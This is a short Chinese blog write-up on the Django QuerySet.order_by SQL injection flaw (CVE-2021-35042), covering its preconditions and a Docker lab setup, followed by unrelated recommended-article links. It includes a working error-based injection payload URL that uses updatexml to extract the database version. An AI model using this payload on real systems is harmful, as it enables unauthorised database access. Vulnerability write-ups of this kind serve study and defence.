漏洞描述
Django 于 2021年7月1日发布了一个安全更新,修复了函数QuerySet.order_by中的 SQL 注入漏洞。
参考链接:
该漏洞需要开发人员使用order_by功能。此外,还可以控制查询集的输入。
漏洞环境及利用
搭建docker环境
payload
/vuln/?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20@@version)),1)%23
Django QuerySet.order_by SQL注入漏洞(CVE-2021-35042)
blackK_YC2023-11-26 19:09
相关推荐
B站_计算机毕业设计之家1 天前
推荐系统实战:python新能源汽车智能推荐(两种协同过滤+Django 全栈项目 源码)计算机专业✅hello 早上好1 天前
深入 Spring 依赖注入底层原理茯苓gao1 天前
Django网站开发记录(一)配置Mniconda,Python虚拟环境,配置Django码界筑梦坊1 天前
267-基于Django的携程酒店数据分析推荐系统Cherry Zack1 天前
Django视图进阶:快捷函数、装饰器与请求响应花菜会噎住1 天前
Django视图与路由全解析:从URL到页面,一篇讲透@PHARAOH1 天前
WHAT - SQLite 数据库kakacc:2 天前
记录一次巧妙的SQL:一对多关联导致的 sum () 、count()等group函数重复计算问题点亮一颗LED(从入门到放弃)2 天前
SQLite3数据库——Linux应用武子康2 天前
Java-148 深入浅出 MongoDB 聚合操作:$match、$group、$project、$sort 全面解析 Pipeline 实例详解与性能优化